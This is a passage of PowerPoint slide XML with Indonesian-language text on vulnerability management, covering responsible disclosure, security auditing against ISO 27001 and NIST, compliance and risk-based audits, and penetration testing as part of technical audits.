              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengungkapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengauditan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>difokuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur-fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menginterogasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ISO 27001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Siber NIST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tolok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>postur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> GDPR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HIPAA; audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>; dan audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempelajari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang-bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penetrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> audit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
